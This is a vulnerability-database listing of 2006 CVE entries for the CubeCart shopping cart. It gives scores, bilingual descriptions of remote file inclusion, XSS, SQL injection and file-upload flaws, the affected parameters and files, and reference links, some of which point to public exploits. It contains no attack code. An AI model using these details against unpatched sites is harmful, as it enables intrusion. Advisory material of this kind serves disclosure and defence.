CVSS: 2.6EPSS: 1%CPEs: 1EXPL: 0CVE-2006-4527
https://notcve.org/view.php?id=CVE-2006-4527
includes/content/gateway.inc.php in CubeCart 3.0.12 and earlier, when magic_quotes_gpc is disabled, uses an insufficiently restrictive regular expression to validate the gateway parameter, which allows remote attackers to conduct PHP remote file inclusion attacks. includes/content/gateway.inc.php en CubeCart 3.0.12 y anteriores, cuando magic_quites_gpc está desactivado, usa una expresión regular insuficientemente restrictiav para validar el parámetro gateway, lo que permite a atacantes remotos llevar a cabo ataques de inclusión remota de archivos en PHP. • http://cubecart.com/site/forums/index.php?showtopic=21540 http://secunia.com/advisories/21659 http://www.cubecart.com/site/forums/index.php?s=5e34938dc670782af211587b8a450c90&act=Attach&type=post&id=697 http://www.gulftech.org/?node=research&article_id=00111-08282006& http://www.securityfocus.com/bid/19782 •
CVSS: 6.8EPSS: 17%CPEs: 6EXPL: 4CVE-2006-4268
https://notcve.org/view.php?id=CVE-2006-4268
Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file, (2) x, and (3) y parameters in (a) admin/filemanager/preview.php; and the (4) email parameter in (b) admin/login.php. Múltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en CubeCart 3.0.11 y anteriores permiten a atacantes remotos inyectar secuencias de comandos web o HTML a través de los parámetros (1) file, (2) x, e (3) y en (a) admin/filemanager/preview.php; y el parámetro (4) email en (b) admin/login.php. • http://bugs.cubecart.com/?do=details&id=523 http://retrogod.altervista.org/cubecart_3011_adv.html http://secunia.com/advisories/21538 http://securityreason.com/securityalert/1429 http://securitytracker.com/id?1016708 http://www.cubecart.com/site/forums/index.php?showtopic=21247 http://www.osvdb.org/27987 http://www.osvdb.org/displayvuln.php?osvdb_id=27986 http://www.securityfocus.com/archive/1/443476/100/0/threaded http://www.securityfocus.com/bid/19563 http://www.vupen •
CVSS: 7.5EPSS: 1%CPEs: 6EXPL: 6CVE-2006-4267 – CubeCart 3.0.11 - 'oid' Blind SQL Injection
https://notcve.org/view.php?id=CVE-2006-4267
Multiple SQL injection vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) oid parameter in modules/gateway/Protx/confirmed.php and the (2) x_invoice_num parameter in modules/gateway/Authorize/confirmed.php. Múltiples vulnerabilidades de inyección SQL en Cubecart 3.0.11 y anteriores permiten a atacantes remotos ejecuatr comandos SWL de su elección mediante el parámetro (1) oid en modules/gateway/Protx/confirmed.php y el parámetro (2) x_invoice_num en modules/gateway/Authorize/confirmed.php. • https://www.exploit-db.com/exploits/2198 http://bugs.cubecart.com/?do=details&id=523 http://retrogod.altervista.org/cubecart_3011_adv.html http://retrogod.altervista.org/cubecart_3011_sql.html http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html http://secunia.com/advisories/21538 http://securityreason.com/securityalert/1429 http://securitytracker.com/id?1016708 http://www.cubecart.com/site/forums/index.php?showtopic=21247 http://www.osvdb.org/27984 http://www.os •
CVSS: 5.0EPSS: 5%CPEs: 11EXPL: 1CVE-2006-0922 – CubeCart 3.0.x - Arbitrary File Upload
https://notcve.org/view.php?id=CVE-2006-0922
CubeCart 3.0 through 3.6 does not properly check authorization for an administration session because of a missing auth.inc.php include, which results in an absolute path traversal vulnerability in FileUpload in connector.php (aka upload.php) that allows remote attackers to upload arbitrary files via a modified CurrentFolder parameter in a direct request to admin/filemanager/upload.php. • https://www.exploit-db.com/exploits/27304 http://securityreason.com/securityalert/482 http://www.cubecart.com/site/forums/index.php?showtopic=14704 http://www.cubecart.com/site/forums/index.php?showtopic=14817 http://www.cubecart.com/site/forums/index.php?showtopic=14825 http://www.cubecart.com/site/forums/index.php?showtopic=14960 http://www.cubecart.com/site/forums/index.php? •
CVSS: 4.3EPSS: 1%CPEs: 1EXPL: 4CVE-2006-0245
https://notcve.org/view.php?id=CVE-2006-0245
Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.7-pl1 allow remote attackers to inject arbitrary web script or HTML via the (3) redir, (4) productId, (5) docId, (6) act, and (7) catId parameters in index.php; and the (8) username field in a login action in index.php. NOTE: the cart.php/redir and index.php/searchStr vectors are already covered by CVE-2005-3152. • http://bugs.cubecart.com/?do=details&id=459 http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html http://secunia.com/advisories/18519 http://www.osvdb.org/22471 http://www.securityfocus.com/bid/16259 http://www.vupen.com/english/advisories/2006/0227 https://exchange.xforce.ibmcloud.com/vulnerabilities/24177 •